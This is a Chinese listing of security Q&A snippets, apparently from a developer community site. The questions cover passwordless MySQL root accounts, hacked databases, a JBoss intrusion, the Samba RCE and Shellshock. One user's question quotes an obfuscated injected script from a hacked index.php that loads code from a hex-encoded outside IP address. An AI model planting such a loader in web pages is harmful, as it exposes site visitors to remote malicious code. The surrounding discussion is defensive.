您的配置文件包含与默认的MySQL特权帐户相对应的设置(根没有密码)。您的MySQL服务器在此默认情况下运行,对入侵是开放的,您确实应该通过为用户“root”设置密码来修复这个安全漏洞。
浏览 5提问于2012-01-29得票数 12
回答已采纳
1回答
配置文件无密码
、、、
我为MySQL和PHP运行本地主机服务器,在phpMyAdmin中,我得到粉色背景上的消息:有谁能告诉我有什么风险吗?有吗?比如呢?
诚挚的问候
浏览 1提问于2015-09-25得票数 0
在安装了简单的php之后,它会显示“你的配置文件包含了与默认的MySQL特权帐户相对应的设置(根用户没有密码)。你的MySQL服务器就是以这个默认帐户运行的,是开放给入侵的,你真的应该为用户‘根’设置一个密码来修复这个安全漏洞。”
浏览 6提问于2014-04-19得票数 0
回答已采纳
2回答
我有一个网站和mysql数据库表中的条目被删除或更改了值。我在网站上有一些表格。他有可能注射过吗?
怎么弄清楚他是怎么做到的?
浏览 0提问于2010-09-26得票数 0
我的MySQL数据库一直被黑客入侵,我找不到漏洞。我在PHP中有坚实的保护来防止注入,而黑客本人已经与我沟通,并且说他不是通过注入的方式进行黑客攻击。
如果不注射,我还能用什么方式被黑呢?那么,如何在不注入的情况下篡改MySQL数据库呢?
浏览 0提问于2014-12-12得票数 4
2回答
我们刚刚入侵了我们的一台服务器,一个入侵者使用JBoss帐户进行访问,并开始运行开发脚本。服务器已经离线,正在接受调查,但我很好奇他是怎么进来的。JBoss 4.x.x中是否存在允许入侵者通过该帐户运行shell脚本的已知漏洞?
浏览 0提问于2011-03-10得票数 6
回答已采纳
我确实理解,基本上所有版本的从3.5.0开始的Samba容易受到远程代码执行漏洞的攻击。甚至还有PoC码来检查一个特定的服务器是否易受攻击。但我不明白服务器在什么具体情况下易受攻击。让攻击者利用此漏洞的状态和事件的确切组合是什么?
浏览 0提问于2017-05-26得票数 4
回答已采纳
2回答
这是什么弱点?
、、
我发现了一个漏洞,在这个漏洞中,多个用户可以使用同一个浏览器登录,而不会破坏其他会话。这类漏洞被称为什么,这种漏洞的影响是什么?很多时候,我发现了一些漏洞,但无法入侵,acunetix漏洞扫描器显示这个软件很容易被盲目注入,但是我不知道在that.Any读取之后该怎么办,或者建议这样做?
浏览 0提问于2014-11-09得票数 -1
当我启动phpmyadmin时,我看到以下消息:
如果攻击者不是从正确的主机登录到mysql,那么还有什么其他方法可以让他登录到mysql呢?
浏览 9提问于2012-08-30得票数 0
回答已采纳
自从我们将一台家用windows机器升级到Windows 10之后,卡巴斯基就一直在通过8080端口记录阻止网络入侵的尝试。该漏洞是一个奇怪的漏洞,试图攻击机器没有的漏洞。如果我们没有得到网络入侵的企图,我不会考虑它,但很明显,一些东西被转发到公共互联网,以使这种情况发生。我怎么才能解决这个问题?
浏览 0提问于2019-11-12得票数 3
但它也是一个安全漏洞,因为它也可以运行任何其他命令。同样,我如何避免来自git pull --upload-pack的漏洞
浏览 3提问于2012-08-28得票数 2
回答已采纳
3回答
我在我的变量上使用了mysql_real_escape_string(),但在查看我的日志时,我注意到来自某人的输入流,其中的条目如下:编辑:我看不到任何损坏,但网站上的大多数输入区都被多次尝试过。
浏览 2提问于2013-01-27得票数 4
2回答
我知道如果黑客利用Windows XP中的DCOM漏洞,他可以做些什么,但这种漏洞存在于Windows 7或Windows 8上吗?换句话说,黑客只知道我的机器的IP地址,就能像Windows机器那样远程入侵系统吗?
浏览 0提问于2014-08-17得票数 0
在我的根index.php文件中,我已经看到这种情况发生了两次。我添加了这个东西
<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5=
浏览 1提问于2010-06-07得票数 0
回答已采纳
有很多关于贝类攻击漏洞的帖子。我能很详细地理解这个漏洞。
然而,我很好奇为什么任何入侵检测系统或基于主机的工具(例如防病毒系统)都无法检测到它?
浏览 0提问于2015-01-14得票数 1
首先,为了防止mysql注入,我在php中使用了PDO。无论如何,我被黑客入侵了,他们没有删除数据库,但里面充满了这个电子邮件111-222-1933电子邮件@adress.tst和一个奇怪的代码。我想他们是用acunetix来查看我网站的漏洞的。
我的问题是:你知道黑客做了什么吗?除了PDO之外,我还可以在我的网站上使用哪些措施来提高安全性?
浏览 0提问于2013-08-19得票数 0
1回答
我正在编译漏洞和相关的攻击,我需要找到一个著名的攻击,利用一个使用后无漏洞。我找了一段时间了,虽然我似乎找不到任何东西。我知道很多时候在互联网浏览器和其他软件中都发现了自由后使用,虽然我只知道漏洞和更新页面,而不是具体的攻击。
浏览 0提问于2018-10-29得票数 0
2回答
手机语音邮件窃听
、、
最近,“世界新闻报”的员工入侵了名人和犯罪受害者的语音信箱。利用什么漏洞来实现这一目标,其他手机用户面临的风险又是什么呢?
浏览 0提问于2011-07-08得票数 5
回答已采纳
2回答
尽管现在登录时,我在phpmyadmin屏幕底部确实收到了两条消息:“phpMyAdmin配置存储尚未完全配置,一些扩展功能已被禁用。
浏览 0提问于2013-06-29得票数 2
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM活动推荐
腾讯云开发者
